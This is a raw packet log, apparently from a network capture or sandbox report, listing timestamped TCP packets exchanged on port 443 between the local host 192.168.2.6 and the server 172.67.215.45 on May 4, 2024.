May 4, 2024 09:48:39.257683992 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.257707119 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.257745028 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.257750034 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.257781029 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.257796049 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.260202885 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.260226011 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.260274887 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.260279894 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.260323048 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.263686895 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.263715029 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.263748884 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.263755083 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.263788939 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.263807058 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.266581059 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.266604900 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.266812086 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.266812086 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.266819000 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.266866922 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.269201040 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.269226074 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.269259930 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.269264936 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.269292116 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.269305944 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.271987915 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.272011042 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.272047043 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.272053003 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.272089958 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.272111893 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.275242090 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.275298119 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.275302887 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.275310993 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.275350094 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.277982950 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.278012991 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.278050900 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.278054953 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.278088093 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.278104067 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.280700922 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.280730009 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.280760050 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.280765057 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.280801058 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.280826092 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.283418894 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.283443928 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.283472061 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.283477068 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.283504009 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.283519030 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.286789894 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.286847115 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.286849022 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.286868095 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.286892891 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.286912918 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.289488077 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.289510965 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.289546013 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.289551020 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.289576054 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.289589882 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.291964054 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.291986942 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.292016029 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.292023897 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.292057991 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.292071104 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.294409990 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.294445038 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.294467926 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.294472933 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.294500113 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.294512033 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.297590017 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.297621012 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.297648907 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.297653913 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.297678947 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.297698021 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.299930096 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.299952030 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.299983978 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.299988985 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.300033092 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.300123930 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.301873922 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.301897049 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.301928997 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.301934004 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.301959991 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.301983118 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.304697037 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.304729939 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.304763079 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.304768085 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.304790020 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.304806948 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.306572914 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.306597948 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.306637049 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.306648016 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.306674957 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.306694984 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.309324980 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.309345961 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.309379101 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.309382915 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.309408903 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.309427023 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.311136961 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.311165094 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.311199903 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.311204910 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.311223030 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.311240911 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.313779116 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.313801050 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.313843012 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.313848019 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.313874960 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.313888073 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.315531969 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.315562010 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.315589905 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.315593958 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.315625906 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.315644026 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.318187952 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.318216085 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.318247080 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.318252087 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.318276882 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.318293095 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.320744991 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.320771933 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.320796967 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.320801973 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.320826054 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.320859909 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.322715998 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.322738886 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.322767973 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.322772980 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.322803020 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.322810888 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.325328112 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.325356007 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.325382948 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.325387955 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.325412989 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.325432062 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.327116966 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.327141047 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.327172995 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.327177048 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.327203035 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.327215910 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.329746962 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.329777002 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.329811096 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.329814911 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.329839945 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.329854965 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.331559896 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.331583023 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.331618071 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.331621885 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.331648111 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.331666946 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.334333897 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.334358931 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.334389925 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.334394932 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.334420919 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.334434986 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.336148024 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.336169958 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.336201906 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.336206913 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.336232901 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.336251974 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.338715076 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.338737965 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.338787079 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.338793993 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.338830948 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.340514898 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.340536118 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.340569019 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.340574980 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.340600967 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.340627909 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.343147039 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.343190908 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.343209028 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.343213081 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.343235016 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.343254089 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.345076084 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.345109940 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.345139980 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.345145941 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.345180035 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.347712040 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.347748041 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.347775936 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.347780943 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.347807884 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.347835064 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.349461079 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.349489927 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.349520922 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.349524975 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.349549055 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.349585056 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.352247000 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.352267027 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.352304935 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.352309942 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.352341890 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.352360964 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.354748011 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.354773998 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.354804993 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.354809046 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.354836941 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.354847908 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.356678963 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.356700897 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.356739044 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.356744051 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.356765985 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.356784105 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.359316111 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.359337091 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.359394073 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.359399080 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.359451056 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.361109018 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.361133099 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.361172915 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.361177921 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.361203909 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.361219883 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.363704920 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.363727093 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.363818884 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.363825083 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.363871098 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.365503073 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.365521908 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.365562916 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.365569115 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.365618944 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.368311882 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.368344069 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.368366003 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.368371010 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.368396044 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.368410110 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.388700008 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.388720989 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.388756990 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.388762951 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.388793945 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.388812065 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.390377998 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.390393019 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.390439034 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.390445948 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.390480042 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.392376900 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.392391920 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.392446041 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.392452002 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.392499924 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.394114017 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.394130945 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.394191980 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.394197941 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.394279003 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.398989916 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.399019957 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.399048090 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.399053097 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.399084091 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.399091959 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.399333000 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.399348021 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.399391890 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.399395943 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.399420023 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.399446964 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.401174068 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.401190042 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.401235104 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.401240110 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.401273966 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.403364897 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.403378963 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.403424978 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.403429985 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.403466940 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.405025959 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.405040026 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.405139923 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.405145884 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.405180931 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.405798912 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.405814886 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.405859947 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.405864954 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.405910015 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.407922983 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.407938004 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.407982111 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.407985926 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.408051014 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.410305023 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.410320997 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.410367012 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.410372972 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.410448074 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.412204981 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.412250042 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.412261963 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.412266016 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.412295103 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.412321091 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.413656950 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.413672924 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.413721085 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.413728952 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.413774014 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.416301966 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.416321993 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.416361094 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.416366100 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.416393042 CEST	49707	443	192.168.2.6	172.67.215.45
